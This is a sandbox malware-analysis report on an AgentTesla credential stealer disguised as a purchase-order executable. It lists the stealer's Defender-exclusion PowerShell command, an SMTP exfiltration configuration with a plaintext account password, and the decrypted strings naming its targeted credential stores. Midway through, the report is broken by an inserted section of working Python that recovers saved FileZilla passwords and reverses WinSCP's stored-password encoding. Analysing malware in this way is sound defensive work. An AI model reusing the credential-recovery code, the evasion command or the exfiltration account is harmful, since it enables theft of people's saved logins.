

Windows Analysis Report
PURCHASE ORDER-6350-2024.exe

Overview

General Information

Sample name: PURCHASE ORDER-6350-2024.exe
Analysis ID: 1528943
MD5: e25b8037dca1fdb8e69cb26bd1cb4f17
SHA1: 5a05ef1979ba60a139cb987e7ab3abf1115acba8
SHA256: 42db38678ebdd31dbcab40014ff3b96a8b263f77e8484901226defbdfbb8eba6
Tags: AgentTesla, exe, user-threatcat_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PURCHASE ORDER-6350-2024.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: E25B8037DCA1FDB8E69CB26BD1CB4F17)
    • powershell.exe (PID: 6112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PURCHASE ORDER-6350-2024.exe (PID: 3732 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: E25B8037DCA1FDB8E69CB26BD1CB4F17)
    • PURCHASE ORDER-6350-2024.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe" MD5: E25B8037DCA1FDB8E69CB26BD1CB4F17)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author
0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.PURCHASE ORDER-6350-2024.exe.3ab4e38.4.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, ParentProcessId: 5688, ParentProcessName: PURCHASE ORDER-6350-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ProcessId: 6112, ProcessName: powershell.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, Initiated: true, ProcessId: 1020, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ParentImage: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe, ParentProcessId: 5688, ParentProcessName: PURCHASE ORDER-6350-2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe", ProcessId: 6112, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T13:52:51.176172+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
2024-10-08T13:53:00.382718+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
2024-10-08T13:53:00.382718+0200 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
2024-10-08T13:52:51.176172+0200 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
2024-10-08T13:52:51.176172+0200 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP



AV Detection

Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
Source: PURCHASE ORDER-6350-2024.exe; ReversingLabs: Detection: 21%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: PURCHASE ORDER-6350-2024.exe; Joe Sandbox ML: detected
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack; String decryptor output (one decrypted string per entry):
  • /log.tmp
  • <br>[
  • yyyy-MM-dd HH:mm:ss
  • ]<br>
  • <br>
  • Time:
  • MM/dd/yyyy HH:mm:ss
  • <br>User Name:
  • <br>Computer Name:
  • <br>OSFullName:
  • <br>CPU:
  • <br>RAM:
  • <br>
  • IP Address:
  • <br>
  • <hr>
  • New
  • MM/dd/yyyy HH:mm:ss
  • IP Address:
  • false
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  • false
  • false
  • false
  • false
  • false
  • false
  • false
  • false
  • mail.mbarieservicesltd.com
  • saless@mbarieservicesltd.com
  • *o9H+18Q4%;M
  • iinfo@mbarieservicesltd.com
  • false
  • false
  • appdata
  • KTvkzEc
  • KTvkzEc.exe
  • KTvkzEc
  • Type
  • <br>
  • <hr>
  • <br>
  • <b>[
  • ]</b> (
  • )<br>
  • {BACK}
  • {ALT+TAB}
  • {ALT+F4}
  • {TAB}
  • {ESC}
  • {Win}
  • {CAPSLOCK}
  • {KEYUP}
  • {KEYDOWN}
  • {KEYLEFT}
  • {KEYRIGHT}
  • {DEL}
  • {END}
  • {HOME}
  • {Insert}
  • {NumLock}
  • {PageDown}
  • {PageUp}
  • {ENTER}
  • {F1}
  • {F2}
  • {F3}
  • {F4}
  • {F5}
  • {F6}
  • {F7}
  • {F8}
  • {F9}
  • {F10}
  • {F11}
  • {F12}
  • control
  • {CTRL}
  • &amp;
  • &lt;
  • &gt;
  • &quot;
  • <br><hr>Copied Text: <br>
  • <hr>
  • logins
  • IE/Edge
  • 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • Windows Secure Note
  • 3CCD5499-87A8-4B10-A215-608888DD3B55
  • Windows Web Password Credential
  • 154E23D0-C644-4E6F-8CE6-5069272F999F
  • Windows Credential Picker Protector
  • 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • Web Credentials
  • 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • Windows Credentials
  • E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • Windows Domain Certificate Credential
  • 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • Windows Domain Password Credential
  • 3C886FF3-2669-4AA2-A8FB-3F6759A77548
  • Windows Extended Credential
  • 00000000-0000-0000-0000-000000000000
  • SchemaId
  • pResourceElement
  • pIdentityElement
  • pPackageSid
  • pAuthenticatorElement
  • IE/Edge
  • UC Browser
  • UCBrowser\
  • Login Data
  • journal
  • wow_logins
  • Safari for Windows
  • \Common Files\Apple\Apple Application Support\plutil.exe
  • \Apple Computer\Preferences\keychain.plist
  • <array>
  • <dict>
  • <string>
  • </string>
  • <string>
  • </string>
  • <data>
  • </data>
  • -convert xml1 -s -o "
  • \fixed_keychain.xml"
  • \Microsoft\Credentials\
  • \Microsoft\Credentials\
  • \Microsoft\Credentials\
  • \Microsoft\Credentials\
  • \Microsoft\Protect\
  • credential
  • QQ Browser
  • Tencent\QQBrowser\User Data
  • \Default\EncryptedStorage
  • Profile
  • \EncryptedStorage
  • entries
  • category
  • Password
  • str3
  • str2
  • blob0
  • password_value
  • IncrediMail
  • PopPassword
  • SmtpPassword
  • Software\IncrediMail\Identities\
  • \Accounts_New
  • PopPassword
  • SmtpPassword
  • SmtpServer
  • EmailAddress
  • Eudora
  • Software\Qualcomm\Eudora\CommandLine\
  • current
  • Settings
  • SavePasswordText
  • Settings
  • ReturnAddress
  • Falkon Browser
  • \falkon\profiles\
  • profiles.ini
  • startProfile=([A-z0-9\/\.\"]+)
  • profiles.ini
  • \browsedata.db
  • autofill
  • ClawsMail
  • \Claws-mail
  • \clawsrc
  • \clawsrc
  • passkey0
  • master_passphrase_salt=(.+)
  • master_passphrase_pbkdf2_rounds=(.+)
  • \accountrc
  • smtp_server
  • address
  • account
  • \passwordstorerc
  • {(.*),(.*)}(.*)
  • Flock Browser
  • APPDATA
  • \Flock\Browser\
  • signons3.txt
  • DynDns
  • ALLUSERSPROFILE
  • Dyn\Updater\config.dyndns
  • username=
  • password=
  • https://account.dyn.com/
  • t6KzXhCh
  • ALLUSERSPROFILE
  • Dyn\Updater\daemon.cfg
  • global
  • accounts
  • account.
  • username
  • account.
  • password
  • Psi/Psi+
  • name
  • password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Psi/Psi+
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Psi\profiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Psi+\profiles
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \accounts.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \accounts.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: OpenVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: username
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: auth-data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: entropy
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: USERPROFILE
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \OpenVPN\config\
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: remote
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: remote
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVpn.exe*
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: user.config
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: //setting[@name='Username']/value
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: //setting[@name='Password']/value
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Private Internet Access
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: %ProgramW6432%
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Private Internet Access\data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \Private Internet Access\data
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \account.json
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: .*"username":"(.*?)"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: .*"password":"(.*?)"
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Private Internet Access
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: privateinternetaccess.com
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: FileZilla
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Server>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Host>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Host>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Host>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Port>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Port>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <User>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <User>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </User>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Pass>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: </Pass>
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: CoreFTP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: User
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Host
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Port
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: WinSCP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: HostName
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: UserName
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: Password
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PublicKeyFile
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: PortNumber
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: WinSCP
                        Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpackString decryptor: ABCDEF
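The FileZilla strings (recentservers.xml, `<Pass encoding="base64">`) and the WinSCP strings (the Sessions registry key with HostName, UserName, Password) are enough to recover saved credentials outright, because neither store relies on a secret the reading process lacks. The block below is an added example, not part of the Joe Sandbox report and not the sample's code: it decodes a FileZilla recentservers.xml and re-implements WinSCP's stored-password scheme as published in WinSCP's own Security.cpp (per byte: bitwise NOT, XOR 0xA3, two hex digits; the clear text is UserName+HostName+password, preceded by a shift byte's worth of random filler and padded to 100 hex digits). The `ABCDEF` string above is, on my reading, the tail of the hex alphabet `0123456789ABCDEF` that scheme uses; the report itself does not say so. The XML, session name, account and password are constructed, and the filler is fixed at zero bytes so the output is reproducible.

```python
"""Recover saved credentials from two stores named in the decrypted strings.

Added example, not from the report or the sample. FileZilla keeps passwords as
plain base64 in recentservers.xml; WinSCP uses the reversible "simple"
obfuscation from its public Security.cpp. Sample inputs below are constructed.
"""
import base64
import xml.etree.ElementTree as ET

PW_MAGIC = 0xA3   # PWALG_SIMPLE_MAGIC in WinSCP
PW_FLAG = 0xFF    # PWALG_SIMPLE_FLAG: marks the current on-disk layout
PW_MAXLEN = 50    # PWALG_SIMPLE_MAXLEN: value is padded to 100 hex digits
HEX = "0123456789ABCDEF"   # WinSCP's digit alphabet (cf. the "ABCDEF" string above)


def filezilla_recentservers(xml_text: str):
    """Return [(host, port, user, password)] from a FileZilla recentservers.xml."""
    out = []
    for server in ET.fromstring(xml_text).iter("Server"):
        pw = server.find("Pass")
        password = None
        if pw is not None and pw.text:
            # encoding="base64" is the only transform; older builds wrote <Pass> in clear
            password = (base64.b64decode(pw.text).decode("utf-8")
                        if pw.get("encoding") == "base64" else pw.text)
        out.append((server.findtext("Host"), int(server.findtext("Port", "21")),
                    server.findtext("User"), password))
    return out


def _enc_byte(b: int) -> str:
    """SimpleEncryptChar: ((~b) ^ 0xA3) as two uppercase hex digits."""
    v = ((~b) ^ PW_MAGIC) & 0xFF
    return HEX[v >> 4] + HEX[v & 0x0F]


def _dec_next(it) -> int:
    """SimpleDecryptNextChar: consume two hex digits; 0 once input is exhausted."""
    try:
        hi, lo = next(it), next(it)
    except StopIteration:
        return 0
    return (~((HEX.index(hi) << 4 | HEX.index(lo)) ^ PW_MAGIC)) & 0xFF


def winscp_encrypt(password: str, username: str, hostname: str, shift: int = 3) -> str:
    """Build a WinSCP Password value; filler is 0x00 here where WinSCP uses random bytes."""
    clear = (username + hostname + password).encode("utf-8")
    out = _enc_byte(PW_FLAG) + _enc_byte(0x00) + _enc_byte(len(clear)) + _enc_byte(shift)
    out += _enc_byte(0x00) * shift                  # filler the decoder skips
    out += "".join(_enc_byte(b) for b in clear)
    return out + _enc_byte(0x00) * ((PW_MAXLEN * 2 - len(out)) // 2)   # trailing pad


def winscp_decrypt(hex_value: str, username: str, hostname: str) -> str:
    """DecryptPassword(value, UserName + HostName); '' when the check value fails."""
    it = iter(hex_value.upper())
    flag = _dec_next(it)
    if flag == PW_FLAG:
        _dec_next(it)                      # dummy byte (PWALG_SIMPLE_INTERNAL)
        length = _dec_next(it)
    else:
        length = flag                      # legacy layout: first byte is the length
    for _ in range(_dec_next(it)):         # shift byte: drop that many filler bytes
        _dec_next(it)
    clear = bytes(_dec_next(it) for _ in range(length)).decode("utf-8", "replace")
    if flag == PW_FLAG:
        key = username + hostname
        if not clear.startswith(key):
            return ""                      # value belongs to another session
        clear = clear[len(key):]
    return clear


# Constructed FileZilla recentservers.xml (not taken from a real host)
SAMPLE_RECENTSERVERS = """<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""

if __name__ == "__main__":
    print(filezilla_recentservers(SAMPLE_RECENTSERVERS))
    blob = winscp_encrypt("s3cret!", "alice", "sftp.example.test")
    print(len(blob), winscp_decrypt(blob, "alice", "sftp.example.test"))
```

The check value is why the stealer reads HostName and UserName alongside Password: without them the decoder returns an empty string. The fixed strings beside CoreFTP (`hdfzpysvpzimorhk`) and Flash FXP (`yA36zA48dEhfrvghGRg57h5UlDv3`) play the same role for those clients, a key baked into the client binary, so the defensive conclusion is the same: anything a saved-session feature can read back, a process running as that user can read back too.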
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Flash FXP
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: port
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: user
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: pass
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: quick.dat
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Sites.dat
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \FlashFXP\
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \FlashFXP\
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: FTP Navigator
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \FTP Navigator\Ftplist.txt
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Server
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: No Password
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: User
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SmartFTP
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: WS_FTP
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: HOST
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: PWD=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: PWD=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: FtpCommander
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \cftp\Ftplist.txt
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;Password=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;User=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;Server=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;Port=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;Port=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;Password=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;User=
Source: 6.2.PURCHASE ORDER-6350-2024.exe.400000.0.unpack String decryptor: ;Anonymous=
